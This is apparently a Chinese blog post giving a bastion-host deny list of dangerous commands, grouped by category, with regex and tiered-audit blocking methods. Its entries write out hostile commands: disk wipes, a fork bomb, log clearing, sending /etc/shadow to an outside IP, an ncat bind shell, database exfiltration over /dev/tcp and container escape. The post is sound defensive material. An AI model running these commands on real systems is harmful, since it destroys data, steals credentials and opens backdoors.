堡垒机敏感命令过滤清单

1 月 ago
master@tadisi.com
1 minute

以下是整理的堡垒机需要屏蔽的敏感命令分类清单。

说明

过滤命令的核心目标是增强管理、增强审计、增加危险动作的调用难度,增加应急对抗的时间,并非完全禁止。

例如运维需使用scp传输文件

正则表达式覆盖命令*rm*所有变体,如rm -rfrm --force等则导致完全无法清理垃圾。

再者,如果攻击者安装类似busybox的变体工具、使用alias命令改名、变更usr/bin关键路径等操作,仍可绕过命令过滤。

需要配合服务器主机的监管手段监听命令执行是否安全,是否需要阻断。

一、文件与目录操作类

rm -rf /*rm -rf

‌递归强制删除根目录,导致系统崩溃或数据永久丢失 。‌

mv /重要文件 /dev/null

‌将文件移至黑洞设备,数据不可恢复 。

chmod 777 文件名

‌过度放宽权限,允许任意用户读写执行,引发安全风险 。

chown/chgrp修改系统关键文件属主

‌可能导致权限混乱或提权漏洞 。

> 系统日志文件

清空审计日志,掩盖攻击痕迹

> /var/log/*

‌清空所有日志文件,破坏审计追溯能力‌

wevtutil cl security

清除安全日志(windows)

tar -czvf /tmp/backup.tar.gz /etc

‌打包系统配置文件到临时目录可能被窃取

scp /etc/shadow 外部IP:/tmp

‌外传密码哈希文件

tcpdump -i eth0 port 22 -w /tmp/ssh.pcap

‌抓取SSH流量可能包含敏感信息

二、系统与进程管理类

shutdown/halt/poweroff/reboot

‌意外关闭或重启系统,中断关键服务 。

kill -9 PIDkillall

‌强制终止进程,引发数据不一致或服务异常 。

systemctl stop 核心服务名

停止关键服务(如数据库、网络服务)。

dd if=/dev/zero of=/dev/sda

‌覆盖磁盘数据,造成永久性破坏 。

fork炸弹(如:(){ :|:& };:

‌耗尽系统资源导致瘫痪 。

echo 1 > /proc/sys/kernel/sysrq

启用SysRq后可通过组合键强制操作硬件(如alt+sysrq+b强制重启)

find / -exec rm {} \;

‌递归查找并删除所有文件(比rm -rf更隐蔽)‌

cat /dev/urandom > 设备文件

向设备写入随机数据导致硬件损坏

三、磁盘与分区管理类

fdisk/parted

‌误操作可损坏分区表,致数据丢失 。

mkfs/mkfs.*

‌格式化磁盘或分区,数据不可逆清除 。

mount/umount非常规参数操作

‌可能导致文件系统损坏或未授权访问 。

echo > /dev/sda

直接写入块设备,破坏数据

format C: /y

无条件格式化磁盘(windows)

四、网络与防火墙类

iptables -F/ufw disable

‌清除防火墙规则或禁用防护,系统暴露于攻击 。

nc(Netcat)监听敏感端口

可能用于建立后门或数据传输 。

route del default

‌删除默认路由,导致网络中断 。

ssh -o ProxyCommand

可能用于隧道绕过监控

netsh firewall set opmode disable

关闭防火墙端口(windows)

ssh -R 8080:内网IP:80 跳板机

‌反向代理穿透内网

socat TCP-LISTEN:1234,fork TCP:目标IP:3389

‌端口转发工具

ncat -l 2333 -e /bin/bash

‌开启带shell的反向连接

五、数据库操作类

DROP DATABASE/DROP TABLE

‌删除数据库或表,数据无法恢复 。

TRUNCATE TABLE

‌清空表数据且不记录日志 。

ALTER TABLE删除关键字段

破坏数据结构或业务逻辑 。

mysqldump -uroot -p 数据库 > /dev/tcp/攻击IP/端口

‌通过TCP重定向导出数据库

六、用户与权限管理类

userdel删除系统账号

‌导致依赖该账号的服务异常 。

passwd root或修改特权用户密码

可能被用于恶意提权 。

visudo或直接编辑/etc/sudoers

‌错误配置致权限失控 。

sudo su -sudo -i

‌直接切换root身份,需限制特定用户组使用

visudo -c

‌检查sudoers语法时可能暴露配置漏洞

chattr +i /etc/passwd

‌锁定关键文件防止修改(可能被攻击者滥用)

setfacl -m u:黑客账号:rwx /敏感目录

‌通过ACL权限添加后门账户

七、容器与虚拟化类

docker run -v /:/host -it alpine

‌挂载宿主机根目录逃逸‌

virsh destroy 虚拟机名

‌强制停止虚拟化环境‌

kubectl exec -it pod -- /bin/bash

进入容器后可能横向移动

实现方式

  • 正则表达式阻断

‌如:rm.*屏蔽所有rm变体;^shutdown$精确匹配关机命令 。

  • 分级审计策略

‌如:高敏感命令(如rm)直接阻断;中风险命令(如sudo)触发二次确认 。